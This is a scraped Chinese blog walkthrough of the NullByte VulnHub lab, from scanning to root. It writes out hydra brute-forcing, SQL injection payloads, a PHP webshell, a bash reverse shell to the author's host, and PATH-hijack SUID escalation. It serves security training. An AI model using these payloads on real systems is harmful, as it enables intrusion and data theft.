当前位置: 首页 > news >正文

聊城手机站网站公司电话号码wordpress文章表格自适应

聊城手机站网站公司电话号码,wordpress文章表格自适应,耐克网站建设的历程,北京微网站设计制作服务目录 写在开头 第一步#xff1a;主机发现与端口扫描 第二步#xff1a;Web渗透 第三步#xff1a;hydra密码爆破 第四步#xff1a;SQL注入大赏 方法一#xff1a;手工SQL注入之联合查询 方法二#xff1a;SQL注入写入一句话木马 方法三#xff1a;SQL注入写入…目录 写在开头 第一步主机发现与端口扫描 第二步Web渗透 第三步hydra密码爆破 第四步SQL注入大赏 方法一手工SQL注入之联合查询 方法二SQL注入写入一句话木马 方法三SQL注入写入反弹shell 方法四SQLmap一把梭 第五步SUID可执行文件提权 总结与思考 写在开头 本篇博客根据大佬红队笔记的视频进行打靶详述了打靶的每一步思路并非复现writeup读者耐心看完定会有所收获。本靶机的难度一般但涉及到许多先前的靶机没有提到的知识点同时考验了对SQL注入理解可以有多种方式进行注入是一台很精巧的靶机。本文的打靶过程涉及到关于图片隐写、hydra密码爆破、SQL注入联合查询、SQL注入写shell、suid提权等。打完这个靶机还有一个启发信息搜集如果能更加完整会省很多兜圈子的操作。完整打靶思路详见 「红队笔记」靶机精讲Nullbyte - SQL注入大赏4种注入方式1次呈现_哔哩哔哩_bilibili 本文针对的靶机源于vulnhub详情见 NullByte: 1 ~ VulnHub 下载链接见 Everything you need to know about DNS services - ly0n.me 本靶机的目标是拿到root权限并查看/root目录下的flag。下载成功后用vmware打开将网络链接设置为NAT模式。靶机打开之后如下   第一步主机发现与端口扫描 常规思路命令不细讲了详情可见 渗透测试主机发现和端口扫描的思路方法总结nmapping命令nc.traditional伪设备连接 使用的命令如下 nmap -sn 10.10.10.0/24 nmap --min-rate 10000 -p- 10.10.10.139 nmap -sT -sV -O -sC -p80,111,777,59147 10.10.10.139 nmap -sU --min-rate 10000 -p- 10.10.10.139 nmap --scriptvuln -p80,111,777,59147 10.10.10.139 网段扫描发现靶机ip是10.10.10.139扫描全端口发现开放了如下五个端口8011177759147说实话除了80之外的几个端口是干啥的咱也不太清楚。 具体查看服务版本、操作系统版本、并使用默认脚本进行扫描结果如下 nmap -sT -sV -sC -O -p80,111,777,59147 10.10.10.139 收获就是发现777端口就是ssh的端口。这个靶机修改了ssh的默认端口22。漏洞扫描发现web目录下有几个路径也没有太多收获 第二步Web渗透 常规思路既然开放了80端口那就打开浏览器看看靶机ip有啥 有一张放着光芒的慧眼下面还有一行文字如果你寻找和谐的法则那么你会得到知识。嗯~ o(*▽*)o很哲学但并没有看出来对我打靶有什么启发。先开启个目录爆破吧这回用gobuster扫描试试吧参数dir表示对目录进行扫描-w指定字典-u指定url gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.10.10.139我这里还是插播一个题外话红队笔记在进行目录爆破时喜欢采用的字典是/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt但这个字典曾经在红队打靶KIOPTRIX1.2打靶思路详解vulnhub_Bossfrank的博客-CSDN博客 这篇博客的靶机中没有扫到关键的目录导致兜了一大圈因如果想要扫描结果相对更全可以选择/usr/share/wordlists/dirb/big.txt不过这个靶机好像没啥影响 总之就是发现了几个关键目录/uploads /javascript /phpmyadmin。显然/uploads目录和上传相关说不定我们可以在此上传shell访问试试发现无法列出相应目录不过没关系只要我们可以上传这依旧是个关键路径。 再看phpmyadmin应该就是phpmyadmin的管理界面打开一看果不其然 可能这也是个突破口。我们应该想办法找到这里的密码登录进去寻找更多的信息。也可以尝试弱口令我试了好几个都没成功。然后再回看初始哪个慧眼的界面查看源代码看看有没有啥提示 也没啥提示就是一张图片一句话。图片名称为main.gif。至此对于我来讲基本上就束手无策了。不过由于这是个靶机我们可以采用CTF的思路把这张“慧眼”的图片下载下来看看还有没有啥提示 先用file看看这个文件的具体信息确实就是个gif的图像文件。  然后使用exiftools工具查看这个文件的创建时间、权限、内容等源数据信息 可以看到有一行关于内容的字符串kzMb5nVYJw这个字符串是干啥的呢可以尝试phpmyadmin的界面的口令、也可以尝试ssh登录root账号结果都不对。顺道一提这个kzMb5nVYJw字符串也可以使用strings命令或者直接用010editer等工具直接查看到 kzMb5nVYJw除了是密码还有可能是什么呢还有可能是web目录的一个路径那我们尝试访问10.10.10.129/kzMb5nVYJw看看有没有啥结果吧 还真是个目录这个目录让我们输入Key。 第三步hydra密码爆破 咱也不知道密码Key是啥看一下网页源代码有啥提示 首先我们看到输入框的type是passwordname是key意味着我们要输入密码一类的东西。有一行红字的注释提示这个表单并不连接到mysql数据库密码没有那么复杂。这个提示暗示我们可以尝试一些弱口令同时我感觉还有个言外之意这个表单没有连接到MySQL那么总有其他连接到MySQL的地方吧数据库应该就是MySQL了。经过尝试了弱口令root,admin,1234,123456,12345678等无果后我放弃了。失败的情况如下图提示invalid key同时看到这个界面的逻辑应该是index.php 下一步干脆就爆破吧。可以用burp这种工具爆破红队笔记大佬秉承着尽可能少用图形化工具的原则这里使用hydra脚本爆破由于是post请求参数要添加http-form-post用两个^包围要暴力破解的插值并写上排除的字段invalid key即出现哪些字符表示失败。由于hydra脚本强制要求添加一个-l参数表示login登录账号我们这里随便填写一个即可无实际意义我写的bossfrank然后-P指定爆破脚本一般靶机都可选择rockyou这个字典。 hydra 10.10.10.139 http-form-post /kzMb5nVYJw/index.php:key^PASS^:invalid key -l bossfrank -P /usr/share/wordlists/rockyou.txt破解出来了密码是elite。鼓励我们努力打靶的人都是精英然后咱们用elite输入尝试一下果然成功了进入了下一个页面 第四步SQL注入大赏 看起来这是个用户名的查询页面查看源代码发现这个界面与420search.php这个后端文件有交互。除此之外也看不出啥了。 既然是用户名的查询页面我们就尝试输入几个短字符串看看有什么反应如果什么也不输入直接回车结果如下 看到有两个用户名ramses和isis。输入其他字符串如果输入的字符串是ramses或isis的子串那么会把这两个用户查出来否则结果如下我们搜索bossfrank 没有查到任何结果。既然是查询很可能与数据库有交互这里是否存在SQL注入呢我们试一试仅仅输入一个单引号查询看看有没有报错 很可惜并无报错。那继续尝试其他可能构成闭合或阶段的字符比如\/#)(等发现确实有报错 进一步排查发现出现问题的位置是双引号添加一个双引号即可构成报错 那么我们用双引号构造万能密码试试 or 11 -- - 可以查出所有的账号看了此处确实存在SQL注入 接下来进入本靶机最精彩的环节了红队笔记大佬给出了四种注入方式我将在这里进行一一详解。这四种方式最终都可以拿到ssh登录的凭据。 方法一手工SQL注入之联合查询 最基本的方法还是手工注入可以更加明确注入的逻辑。首先确定列数由前面看到的两个用户名信息感觉应该是3列可以用order by 进行测试按照第几列进行排序先试试三列对不对 order by 3 -- - 其中的-- -用于注释其实只要--空格即可再添加一个-方便我们看到空格。 三列没有报错说明至少有三列那么再试试4列order by 4 -- - 按照第四列排序就会有报错提示第四列未知。看来就是一共有三列。下一步在三列的字段分别查看当前数据库、数据库版本、当前登录用户 union select database(),version,user() -- - ​​​可以看到当前数据库名为seth数据库版本是5.5.44-0高于5.1存在information_schema这个数据库数据库登录用户为root。下一步查看有哪些数据库 union select table_schema, 2, 3 from information_schema.tables -- - 在MySQL5.1的版本中存在一个名为information_schema的数据库这个数据库中有一个名为tables的表其中有一列为table_schema记录了所有的数据库名称结果如下 可以看到一共有5个数据库分别是information_schema,mysql,perforence_schema,phpmyadmin,seth。显然我们最为关注的是seth这个数据库。然后查看seth数据库中有哪些表 union select table_name,2,3 from information_schema.tables where table_schema seth -- - information_schema.tables中同时有一列名为table_name的列记录了数据库中所有的表名上述语句即为查询数据库名称为seth时有哪些表 如上图所示看来整个seth数据库就一张数据表名为users接下来我们只要查看这个表中的列即可 union select column_name,2,3 from information_schema.columns where table_schema seth and table_name users -- - 结果如下 可看到users表中一共有四个字段分别是id,user,pass,position我们直接通过联合查询注入的昂是查找其中的前三个字段一次最多显示三列 union select id, user, pass from users -- - 可以看到有一个用户的账号是ramses密码是YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE这个密码看起来经过了base64编码我们可以尝试进行base64解密 echo YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE | base64 -d其中-d参数表示解密允许结果如下 解密出的字符是c6d6bd7ebf806f43c76acc3681703b81 感觉解密出的字符串像是md5加密的字符可以用hash-identifier识别一下 确实是。那我这里图个方便直接找个在线网站解密md5即可 Decrypt MD5, SHA1, MySQL, NTLM, SHA256, MD5 Email, SHA256 Email, SHA512, Wordpress, Bcrypt hashes for free online 解出来密码是omega可以尝试ssh登录ramses账号注意修改端口号为777而非ssh默认的22端口。 ssh ramses10.10.10.139 -p 777登录成功下一步就可以提权了不过我们这里暂缓提权先讨论其它注入的方式。 方法二SQL注入写入一句话木马 采用另外一种方法进行注入获取登录凭据。我们尝试通过注入写入一句话php木马一句话木马如下 ?php system($_GET[a]);? 实际上注入时能写入文件的前提有两点 1.数据库secure_file_priv参数为空即我们具有写的权限。 2.需要知道写入文件位置的绝对路径。之前进行目录爆破的时候我们看到了目录uploads这个目录很可能可以写入。 实际渗透测试过程中可以不用判断这两个前提直接尝试写入一句话木马如果不行再分析原因。 由于我们已经知道数据库有三列数据因此通过注入写入一句话木马的语句是此处把写入的一句话木马文件命名为shell.php其中into outfile用于写入多行的文本文件 union select ?php system($_GET[a]); ?, 2, 3 into outfile /var/www/html/uploads/shell.php -- - 貌似写入成功了。我们尝试能否通过a参数指令执行命令先执行个ls试试 执行成功了那么我们使用curl指令执行命令吧尝试读取一些敏感文件存在注入的页面的源代码提示我们这个界面与420search.php这个后端文件有交互那我们就尝试读取420search.php即可 curl http://10.10.10.139/uploads/shell.php?acat%20/var/www/html/kzMb5nVYJw/420search.php特别注意指令cat /var/www/html/kzMb5nVYJw/420search.php中的空格由于是存在于url中因此需要将空格url编码为%20。读取成功了 看到了一些敏感信息发现数据库的密码是sunnyvale。那么我们可以尝试使用此密码登录phpmyadmin的管理界面。登录成功 如上图可以查看所有表的信息。自然就能发现数据库seth中的表users存储了ssh登录用户的凭据。接下来的操作就是base64解码和md5解密不赘述了。 方法三SQL注入写入反弹shell 既然可以写入一句话木马那当然也可以直接写入反弹shell的php语句直接拿到shell反弹shell的php语句为注意修改接收反弹shell的ip【我的kali是10.10.10.128】和端口 ?php exec(/bin/bash -c bash -i /dev/tcp/10.10.10.128/1234 01); ? 我们同样可以通过注入的方式直接把这行代码写入/uploads/目录命名为reverse.php注入语句如下 union select ?php exec(\/bin/bash -c bash -i /dev/tcp/10.10.10.128/1234 01\); ?, 2, 3 into outfile /var/www/html/uploads/reverse.php -- - 特别注意由于php语句是在双引号内因此php语句中出现的双引号需要加\进转义。 貌似又注入成功后开启nc监听1234端口 然后浏览器访问靶机ip/uploads/reverse.php成功触发了反弹shell  同样的思路我们直接在这个shell查看420search.php即可 然后同样的思路来到phpmyadmin登录寻找凭据即可。 方法四SQLmap一把梭 最后这个方法就是一键梭哈。在前述注入的时候发现是GET型注入输入的参数最后会提交到url中这就很方便了。 可以直接SQLmap直接跑一下也不用按照数据库、表、列、字段慢慢爆干脆直接--dump看所有结果 sqlmap -u http://10.10.10.139/kzMb5nVYJw/420search.php?usrtosearch --dump 然后就是base64解码和md5解密了不再赘述。听红队笔记大佬的话先懂原理再用工具。 第五步SUID可执行文件提权 先ssh登录ramses ssh ramses10.10.10.139 -p 777 密码omega 然后经过一番搜索无果、sudo -l没有提示、cat /etc/crontab也没找到定时任务后决定看看历史记录找找有没有啥启发直接输入history如下 可以发现运行了/var/www/backup/procwatch那么我们也尝试进入这个目录查看procwatch这个文件是干啥的 cd /var/www/backup ls -liah 注意在权限中具有s位说明该文件运行时具有其属主的权限也就是root的权限。查看一下相同目录下的readme.txt 我必须要搞定这一坨混乱。这是说啥呀咱也没明白。尝试用运行procwatch看看发生了什么 发现貌似还执行了两个命令sh可能与shell相关ps可能与进程相关。此时我们的提权思路就是将提权的代码写入procwatch的相关文件中而这个操作与sh和ps相关这样在执行procwatch的时候由于procwatch具有s权限就可以以root身份运行从而触发提权。 首先建立一个软连接将ps链接到/bin/sh这样在执行procwatch的时候无论是sh还是ps都会把root的shshell带出来 ln -s /bin/sh ps然后我们修改环境变量将当前目录.追加到环境变量的最开始 export PATH.:$PATH在环境变量的路径越靠前执行命令时寻找的目录的优先级就越高。也就是说在我们将当前目录追加到环境变量的最开始位置之后如果系统运行ps命令即运行procwatch会首先在当前目录寻找是否有名为ps的文件又由于我们在这里添加了软连接当前目录是存在名为ps的文件的该文件是个指向sh的软连接因此可以在当前目录执行ps命令实际执行的是启动sh。 然后我们运行procwatch由于procwatch文件具有s权限会以属主root运行通过前面的操作可知运行procwatch会触发sh。因此就相当于以root启动了shell应该就可以提权了。 如下图果然此时运行procwatch即可提权成功 然后我们进入/root目录寻找flag是proof.txt 至此打靶完成 总结与思考 这个靶机很精巧是个很值得练手的靶机。考察了对于SQL注入的理解。虽然SQLmap一把梭的方法很快但还是要从根本上理解SQL语句和注入的原理。另外通过SQL写入shell的方法也很经典值得我们学习。在进行提权的时候通过查看历史命令的方法找到了具有s权限的文件。这启发我们拿到靶机的初始shell后可以通过查看历史命令获得启发。具有s权限的文件对于提权有重要意义查找s权限的文件可以直接使用如下的find命令进行搜索 find / -perm -us -type f 2/dev/null 所谓提取就是通过某些方式使得低权限的用户可以执行高权限的操作。本次提取的核心就是利用s位属主root的执行权限。同时通过软连接修改环境变量的方式对ps指令进行了劫持运行时即可触发提取。最后还是总结一下打靶的全过程 1.主机发现和端口扫描常规思路发现ssh端口为777. 2.web渗透通过查看图片文件的字符串信息发现字符串kzMb5nVYJw经过尝试发现是web目录进入后发现有一个文本框需要输入key 3.网页源代码提示key不复杂使用hydra进行爆破成功的得到key为elite 4.输入elite后成功进入了一个用户名查询页面输入框输入双引号会触发SQL报错判断存在SQL注入可通过四种方式注入最终拿到ssh的登录凭据。 5.ssh登录寻找具有s权限的文件发现/www/var/www/backup/procwatch通过软连接修改环境变量的方式对ps指令进行了劫持运行procwatch即可触发提取。 到此这个靶机就讲解完毕了。打完这个靶机感觉还是挺有收获的。靶机不难总结不易也有很多自己的思考希望读者能够点赞关注多多支持学渗透还是要实操呀。如果读者有什么打靶的问题也欢迎评论区留言指出我一定知无不言
http://www.zqtcl.cn/news/516289/

相关文章:

  • 厦门服装商城网站建设米课做网站
  • ui做网站实例一起做网店网站官方
  • 网站建设合同怎么写wordpress如何设置404页面
  • wordpress 安装过程顺德网站优化
  • 大麦网网站建设的功能定位wordpress图片不被收录
  • 做推广任务的网站渠道营销推广方案
  • 消防中队网站建设施工企业项目经理部管理人员对外行为的法律后果
  • 淘宝的网站建设情况仪器网站模板
  • 网站开发需要掌握的知识什么软件是做网站模板的
  • wap网站管理系统wordpress评论分页不显示不出来
  • 泗阳住房建设局网站泉州网站建设工程
  • 陕西省住房城乡建设部门户网站做百度移动端网站软件
  • 濮阳公司建站怎么自己做网站app
  • 美辰网站建设个人网站如何做移动端
  • 郑州模板网站建设网页在线代理
  • 学生做网站的工作室网站建设项目表
  • .net网站开发教程百度贴吧微网站设计基本要求
  • 无锡网站建设哪家公司好咨询网站建设
  • 优秀的企业网站设计wordpress登陆后台总是跳转首页
  • 国外html5特效网站宁波江北区建设局网站
  • 购物网站哪个是正品商城网站模板下载
  • 网站名称 规则技术支持 石家庄网站建设
  • 专门做私人定制旅游的网站专做韩餐网站
  • 网站 续费wordpress首页调用指定分类
  • 2008系统怎么做网站免费设计软件下载
  • 做电音的软件的专业下载网站宁波俄语网站建设
  • 北?? 网站建设旅游手机网站开发
  • 乐清做网站的网站备案容易通过吗
  • 网站qq登录 开发一个小型网站开发成本
  • 湖北网络建设公司网站js跳转到别的网站